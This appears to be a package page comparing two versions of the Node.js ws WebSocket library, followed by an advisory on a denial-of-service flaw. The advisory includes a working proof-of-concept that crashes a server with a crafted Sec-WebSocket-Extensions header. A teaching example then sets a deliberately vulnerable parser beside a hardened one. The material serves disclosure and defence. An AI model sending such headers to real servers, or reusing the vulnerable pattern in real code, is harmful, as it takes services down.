ws versions 1.1.1 and 1.1.2 are both WebSocket libraries for Node.js, designed for building real-time applications. Both versions aim for simplicity, speed, and thorough testing, and implement RFC 6455. They share the same core dependencies: ultron for managing event listeners and options for handling configuration. The development dependencies (ansi, mocha, should, istanbul, benchmark, expect.js, tinycolor, bufferutil, and utf-8-validate) are also unchanged, indicating a focus on maintaining the existing test suite and performance benchmarks.
The primary difference lies in their release dates. Version 1.1.1 was released in June 2016, while version 1.1.2 came out in February 2017. An eight-month gap at a patch-level increment suggests that version 1.1.2 likely includes bug fixes, performance enhancements, or minor feature additions that do not warrant a major or minor version bump. JavaScript developers considering an upgrade to ws should check the ws changelog for the specific fixes and improvements. If you encounter strange behaviour on version 1.1.1, this updated version should be considered. Keeping dependencies up to date is also a good habit.
All the vulnerabilities related to version 1.1.2 of the package
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
    const WebSocket = require('ws');
    const net = require('net');
    const wss = new WebSocket.Server({ port: 3000 }, function () {
      const payload = 'constructor'; // or ',;constructor'
      const request = [
        'GET / HTTP/1.1',
        'Connection: Upgrade',
        'Sec-WebSocket-Key: test',
        'Sec-WebSocket-Version: 8',
        `Sec-WebSocket-Extensions: ${payload}`,
        'Upgrade: websocket',
        '\r\n'
      ].join('\r\n');
      const socket = net.connect(3000, function () {
        socket.resume();
        socket.write(request);
      });
    });
Update to version 3.3.1 or later.
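The root cause of the crash above is a parser that uses a plain JavaScript object as a dictionary keyed by names taken from the network, so a name like "constructor" resolves to an inherited Object.prototype member instead of an empty slot. The following is an added example written for this page, not ws's own code: a minimal Sec-WebSocket-Extensions parser in a vulnerable form beside a hardened form, run over constructed headers (the grammar handled is a small subset of RFC 6455 section 9.1, and the function names, the token regex and the offer cap are this example's own choices).

```javascript
// Added example for this page (not ws's own code): a minimal parser for the
// Sec-WebSocket-Extensions header in a vulnerable and a hardened form, to
// show why attacker-chosen names that collide with Object.prototype members
// crash a parser that uses a plain object as a dictionary. The grammar handled
// ("name; param=value, name2") is a small subset of RFC 6455 section 9.1,
// enough for the demonstration; all inputs below are constructed.

// Vulnerable form. `dest` and `params` inherit from Object.prototype, so for a
// name such as "constructor" the lookup `dest[name]` is already truthy (it is
// the inherited Object function). Calling `.push` on it throws a TypeError,
// and an uncaught exception in the upgrade handler takes the server down.
function parseExtensionsUnsafe(header) {
  const dest = {};
  for (const offer of header.split(',')) {
    const [rawName, ...rawParams] = offer.split(';');
    const name = rawName.trim();
    if (!name) continue;
    const params = {};
    for (const p of rawParams) {
      const [k, v] = p.split('=').map((s) => s.trim());
      if (!k) continue;
      const value = v === undefined ? true : v;
      if (params[k]) params[k].push(value);   // "constructor" -> TypeError
      else params[k] = [value];
    }
    if (dest[name]) dest[name].push(params);   // "constructor" -> TypeError
    else dest[name] = [params];
  }
  return dest;
}

// Hardened form. A Map has no inherited keys, so no name from the wire can
// alias a prototype member (Object.create(null) would serve as well). Names are
// also checked against the HTTP token grammar, and the number of offers is
// capped so one header cannot force unbounded work.
const TOKEN = /^[!#$%&'*+\-.0-9A-Z^_`a-z|~]+$/;
const MAX_OFFERS = 16;

function parseExtensionsSafe(header) {
  const offers = header.split(',');
  if (offers.length > MAX_OFFERS) throw new RangeError('too many extension offers');
  const dest = new Map();
  for (const offer of offers) {
    const [rawName, ...rawParams] = offer.split(';');
    const name = rawName.trim();
    if (!name) continue;
    if (!TOKEN.test(name)) throw new SyntaxError(`invalid extension name ${JSON.stringify(name)}`);
    const params = new Map();
    for (const p of rawParams) {
      const [k, v] = p.split('=').map((s) => s.trim());
      if (!k) continue;
      if (!TOKEN.test(k)) throw new SyntaxError(`invalid parameter name ${JSON.stringify(k)}`);
      const value = v === undefined ? true : v;
      const values = params.get(k) || [];
      values.push(value);
      params.set(k, values);
    }
    const offersForName = dest.get(name) || [];
    offersForName.push(params);
    dest.set(name, offersForName);
  }
  return dest;
}

// Runs a parser on a header and reports the class of error it raised, or null
// if it parsed cleanly; this is the shape of a regression test for the issue.
function throwsOn(parser, header) {
  try {
    parser(header);
    return null;
  } catch (err) {
    return err.constructor.name;
  }
}

// Constructed inputs: the PoC payload as an extension name, the same name as
// a parameter, a prototype accessor, and a legitimate permessage-deflate offer.
const SAMPLES = [
  'constructor',
  'permessage-deflate; constructor',
  '__proto__',
  'permessage-deflate; client_max_window_bits=10'
];
for (const h of SAMPLES) {
  console.log(JSON.stringify(h), 'unsafe:', throwsOn(parseExtensionsUnsafe, h),
              'safe:', throwsOn(parseExtensionsSafe, h));
}
```

The hardened parser throws only on input that is malformed by the header grammar, which a server can answer with a 400 and log as a rejected upgrade; a prototype-name collision no longer reaches any code path that assumes an own property. In a real server the parser would also sit inside the upgrade handler's error handling, so that a parse failure closes one socket rather than the process.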